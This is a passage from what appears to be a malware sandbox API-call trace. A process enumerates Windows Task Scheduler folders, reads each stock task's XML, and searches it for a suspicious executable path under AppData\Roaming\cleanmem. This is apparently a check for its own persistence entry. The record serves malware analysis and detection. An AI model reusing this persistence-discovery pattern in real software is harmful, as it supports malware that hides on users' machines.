\r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.877] IUnknown:Release (This=0x1270c0) returned 0x0 [0137.877] IUnknown:Release (This=0x126f50) returned 0x0 [0137.877] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f50) returned 0x0 [0137.878] ITaskFolderCollection:get_Count (in: This=0x126f50, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.878] IUnknown:Release (This=0x126f50) returned 0x0 [0137.878] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.878] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.878] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0137.880] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0137.880] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0137.880] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="Proxy") returned 0x0 [0137.880] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n") returned 0x0 [0137.882] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.883] IUnknown:Release (This=0x127080) returned 0x0 [0137.883] IUnknown:Release (This=0x126f30) returned 0x0 [0137.883] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0137.884] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.884] IUnknown:Release (This=0x126f30) returned 0x0 [0137.884] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.884] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.884] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0137.886] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0137.886] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.886] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="UninstallDeviceTask") returned 0x0 [0137.886] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0137.888] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.888] IUnknown:Release (This=0x127090) returned 0x0 [0137.888] IUnknown:Release (This=0x126f40) returned 0x0 [0137.888] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0137.889] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.889] IUnknown:Release (This=0x126f40) returned 0x0 [0137.889] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.889] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.890] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f60) returned 0x0 [0137.893] IRegisteredTaskCollection:get_Count (in: This=0x126f60, pCount=0x24dbd0 | out: pCount=0x24dbd0*=3) returned 0x0 [0137.893] IRegisteredTaskCollection:get_Item (in: This=0x126f60, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270d0) returned 0x0 [0137.893] IRegisteredTask:get_Name (in: This=0x1270d0, pName=0x24da80 | out: pName=0x24da80*="SystemTask") returned 0x0 [0137.893] IRegisteredTask:get_Xml (in: This=0x1270d0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0137.896] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.896] IUnknown:Release (This=0x1270d0) returned 0x0 [0137.896] IRegisteredTaskCollection:get_Item (in: This=0x126f60, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270d0) returned 0x0 [0137.896] IRegisteredTask:get_Name (in: This=0x1270d0, pName=0x24da80 | out: pName=0x24da80*="UserTask") returned 0x0 [0137.896] IRegisteredTask:get_Xml (in: This=0x1270d0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0137.899] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.900] IUnknown:Release (This=0x1270d0) returned 0x0 [0137.900] IRegisteredTaskCollection:get_Item (in: This=0x126f60, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270d0) returned 0x0 [0137.900] IRegisteredTask:get_Name (in: This=0x1270d0, pName=0x24da80 | out: pName=0x24da80*="UserTask-Roam") returned 0x0 [0137.900] IRegisteredTask:get_Xml (in: This=0x1270d0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n") returned 0x0 [0137.902] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.903] IUnknown:Release (This=0x1270d0) returned 0x0 [0137.903] IUnknown:Release (This=0x126f60) returned 0x0 [0137.903] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f60) returned 0x0 [0137.904] ITaskFolderCollection:get_Count (in: This=0x126f60, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.904] IUnknown:Release (This=0x126f60) returned 0x0 [0137.904] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.904] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.904] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f70) returned 0x0 [0137.907] IRegisteredTaskCollection:get_Count (in: This=0x126f70, pCount=0x24dbd0 | out: pCount=0x24dbd0*=3) returned 0x0 [0137.907] IRegisteredTaskCollection:get_Item (in: This=0x126f70, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127100) returned 0x0 [0137.907] IRegisteredTask:get_Name (in: This=0x127100, pName=0x24da80 | out: pName=0x24da80*="Consolidator") returned 0x0 [0137.907] IRegisteredTask:get_Xml (in: This=0x127100, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n") returned 0x0 [0137.910] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.910] IUnknown:Release (This=0x127100) returned 0x0 [0137.910] IRegisteredTaskCollection:get_Item (in: This=0x126f70, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127100) returned 0x0 [0137.910] IRegisteredTask:get_Name (in: This=0x127100, pName=0x24da80 | out: pName=0x24da80*="KernelCeipTask") returned 0x0 [0137.910] IRegisteredTask:get_Xml (in: This=0x127100, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n") returned 0x0 [0137.913] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.914] IUnknown:Release (This=0x127100) returned 0x0 [0137.914] IRegisteredTaskCollection:get_Item (in: This=0x126f70, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127100) returned 0x0 [0137.914] IRegisteredTask:get_Name (in: This=0x127100, pName=0x24da80 | out: pName=0x24da80*="UsbCeip") returned 0x0 [0137.914] IRegisteredTask:get_Xml (in: This=0x127100, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n \r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n") returned 0x0 [0137.917] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n \r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.917] IUnknown:Release (This=0x127100) returned 0x0 [0137.917] IUnknown:Release (This=0x126f70) returned 0x0 [0137.917] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f70) returned 0x0 [0137.919] ITaskFolderCollection:get_Count (in: This=0x126f70, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.919] IUnknown:Release (This=0x126f70) returned 0x0 [0137.919] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.919] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.919] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0137.921] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0137.921] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0137.921] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="ScheduledDefrag") returned 0x0 [0137.921] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n") returned 0x0 [0137.924] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.925] IUnknown:Release (This=0x127080) returned 0x0 [0137.925] IUnknown:Release (This=0x126f30) returned 0x0 [0137.925] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0137.926] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.926] IUnknown:Release (This=0x126f30) returned 0x0 [0137.926] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.926] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.926] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0137.928] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0137.928] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0137.928] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="Scheduled") returned 0x0 [0137.928] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n 